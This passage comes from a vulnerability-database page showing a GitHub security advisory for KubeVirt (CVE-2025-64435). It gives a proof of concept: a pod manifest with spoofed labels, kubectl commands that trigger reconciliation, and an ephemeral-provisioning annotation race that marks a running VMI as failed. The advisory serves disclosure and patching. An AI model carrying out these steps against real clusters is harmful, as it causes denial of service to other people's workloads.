`kubevirt.io/created-by` label:\n\n```yaml\napiVersion: v1\nkind: Pod\nmetadata:\n  name: fake-launcher\n  labels:\n    kubevirt.io: intruder # this is the label used by the virt-controller to identify pods associated with KubeVirt components\n    kubevirt.io/created-by: 18afb8bf-70c4-498b-aece-35804c9a0d11 # this is the UID of the launcher-label-confusion VMI which is going to be taken into account if there is no ownerReference. This is the case for regular pods\n    kubevirt.io/domain: migration\nspec:\n  restartPolicy: Never\n  containers:\n    - name: alpine\n      image: alpine\n      command: [ \"sleep\", \"3600\" ]\n```\n\n```bash\noperator@minikube:~$ kubectl apply -f fake-launcher.yaml\n# Get the UID of the `fake-launcher` pod\noperator@minikube:~$ kubectl get pod fake-launcher -o jsonpath=\u0027{.metadata.uid}\u0027\n39479b87-3119-43b5-92d4-d461b68cfb13\n```\n\nTo effectively attach the fake pod to the VMI, the attacker should wait for a state update to trigger the reconciliation loop:\n\n```bash\n# Trigger the VMI reconciliation loop\noperator@minikube:~$ kubectl patch vmi launcher-label-confusion -p \u0027{\"metadata\":{\"annotations\":{\"trigger-annotation\":\"quarkslab\"}}}\u0027 --type=merge\nvirtualmachineinstance.kubevirt.io/launcher-label-confusion patched\n# Confirm that fake-launcher pod has been associated with the VMI\noperator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath=\u0027{.status.activePods}\u0027\n{\"39479b87-3119-43b5-92d4-d461b68cfb13\":\"minikube\", # `fake-launcher` pod\u0027s UID\n\"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8\":\"minikube\"} # original `virt-launcher` pod UID\n```\n\n\nTo illustrate the impact of this vulnerability, a race condition will be triggered in the `sync` function of the VMI controller:\n\n\n```go\n// pkg/virt-controller/watch/vmi.go\n\nfunc (c *Controller) sync(vmi *virtv1.VirtualMachineInstance, pod *k8sv1.Pod, dataVolumes []*cdiv1.DataVolume) (common.SyncError, *k8sv1.Pod) {\n  //...\n  if !isTempPod(pod) \u0026\u0026 controller.IsPodReady(pod) {\n\n\t\t// mark the pod with annotation to be evicted by this controller\n\t\tnewAnnotations := map[string]string{descheduler.EvictOnlyAnnotation: \"\"}\n\t\tmaps.Copy(newAnnotations, c.netAnnotationsGenerator.GenerateFromActivePod(vmi, pod))\n    // here a new updated pod is returned\n\t\tpatchedPod, err := c.syncPodAnnotations(pod, newAnnotations)\n\t\tif err != nil {\n\t\t\treturn common.NewSyncError(err, controller.FailedPodPatchReason), pod\n\t\t}\n\t\tpod = patchedPod\n    // ...\n\nfunc (c *Controller) syncPodAnnotations(pod *k8sv1.Pod, newAnnotations map[string]string) (*k8sv1.Pod, error) {\n\tpatchSet := patch.New()\n\tfor key, newValue := range newAnnotations {\n\t\tif podAnnotationValue, keyExist := pod.Annotations[key]; !keyExist || podAnnotationValue != newValue {\n\t\t\tpatchSet.AddOption(\n\t\t\t\tpatch.WithAdd(fmt.Sprintf(\"/metadata/annotations/%s\", patch.EscapeJSONPointer(key)), newValue),\n\t\t\t)\n\t\t}\n\t}\n\tif patchSet.IsEmpty() {\n\t\treturn pod, nil\n\t}\n\t\n\tpatchBytes, err := patchSet.GeneratePayload()\n\t// ...\n\tpatchedPod, err := c.clientset.CoreV1().Pods(pod.Namespace).Patch(context.Background(), pod.Name, types.JSONPatchType, patchBytes, v1.PatchOptions{})\n  // ...\n\treturn patchedPod, nil\n}\n```\n\nThe above code adds additional annotations to the `virt-launcher` pod related to node eviction. This happens via an API call to Kubernetes which upon success returns a new updated pod object. This object replaces the current one in the execution flow.\nThere is a tiny window where an attacker could trigger a race condition which will mark the VMI as failed:\n\n```go\n// pkg/virt-controller/watch/vmi.go\n\nfunc isTempPod(pod *k8sv1.Pod) bool {\n  // EphemeralProvisioningObject string = \"kubevirt.io/ephemeral-provisioning\"\n\t_, ok := pod.Annotations[virtv1.EphemeralProvisioningObject]\n\treturn ok\n}\n```\n\n```go\n// pkg/virt-controller/watch/vmi.go\n\nfunc (c *Controller) updateStatus(vmi *virtv1.VirtualMachineInstance, pod *k8sv1.Pod, dataVolumes []*cdiv1.DataVolume, syncErr common.SyncError) error {\n  // ...\n  vmiPodExists := controller.PodExists(pod) \u0026\u0026 !isTempPod(pod)\n\ttempPodExists := controller.PodExists(pod) \u0026\u0026 isTempPod(pod)\n\n  //...\n  case vmi.IsRunning():\n\t\tif !vmiPodExists {\n      // MK: this will toggle the VMI phase to Failed\n\t\t\tvmiCopy.Status.Phase = virtv1.Failed\n\t\t\tbreak\n\t\t}\n    //...\n\n  vmiChanged := !equality.Semantic.DeepEqual(vmi.Status, vmiCopy.Status) || !equality.Semantic.DeepEqual(vmi.Finalizers, vmiCopy.Finalizers) || !equality.Semantic.DeepEqual(vmi.Annotations, vmiCopy.Annotations) || !equality.Semantic.DeepEqual(vmi.Labels, vmiCopy.Labels)\n\tif vmiChanged {\n    // MK: this will detect that the phase of the VMI has changed and updated the resource\n\t\tkey := controller.VirtualMachineInstanceKey(vmi)\n\t\tc.vmiExpectations.SetExpectations(key, 1, 0)\n\t\t_, err := c.clientset.VirtualMachineInstance(vmi.Namespace).Update(context.Background(), vmiCopy, v1.UpdateOptions{})\n\t\tif err != nil {\n\t\t\tc.vmiExpectations.LowerExpectations(key, 1, 0)\n\t\t\treturn err\n\t\t}\n\t}\n```\n\nTo trigger it, the attacker should update the `fake-launcher` pod\u0027s annotations before the check `vmiPodExists := controller.PodExists(pod) \u0026\u0026 !isTempPod(pod)` in `sync`, and between the check `if !isTempPod(pod) \u0026\u0026 controller.IsPodReady(pod)` in `sync` but before the patch API call in `syncPodAnnotations` as follows:\n\n```yaml\nannotations:\n    kubevirt.io/ephemeral-provisioning: \"true\"\n```\n\nThe above annotation will mark the attacker pod as ephemeral (i.e., used to provision the VMI) and will fail the VMI as the latter is already running (provisioning happens before the VMI starts running).\n\nThe update should also happen during the reconciliation loop when the `fake-launcher` pod is initially going to be associated with the VMI and its labels, related to eviction, updated.\n\n\nUpon successful exploitation the VMI is marked as failed and could not be controlled via the Kubernetes API. However, the QEMU process is still running and the VMI is still present in the cluster:\n\n\n```bash\noperator@minikube:~$ kubectl get vmi\nNAME                       AGE    PHASE    IP            NODENAME   READY\nlauncher-label-confusion   128m   Failed   10.244.0.10   minikube   False\n# The VMI is not reachable anymore \noperator@minikube:~$ virtctl console launcher-label-confusion\nOperation cannot be fulfilled on virtualmachineinstance.kubevirt.io \"launcher-label-confusion\": VMI is in failed status\n\n# The two pods are still associated with the VMI\n\noperator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath=\u0027{.status.activePods}\u0027 \n{\"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8\":\"minikube\",\"ca31c8de-4d14-4e47-b942-75be20fb9d96\":\"minikube\"}\n```\n\n### Impact\nAs a result, an attacker could provoke a DoS condition for the affected VMI, compromising the availability of the services it provides.",
  "id": "GHSA-9m94-w2vq-hcf9",
  "modified": "2025-11-17T21:43:42Z",
  "published": "2025-11-06T23:35:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-9m94-w2vq-hcf9"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64435"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kubevirt/kubevirt/commit/9a6f4a3a707992038ef705da4cb3bba8c89d36ba"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/kubevirt/kubevirt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-64435 (GCVE-0-2025-64435)

MSRC_CVE-2025-64435

FKIE_CVE-2025-64435

GHSA-9M94-W2VQ-HCF9

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature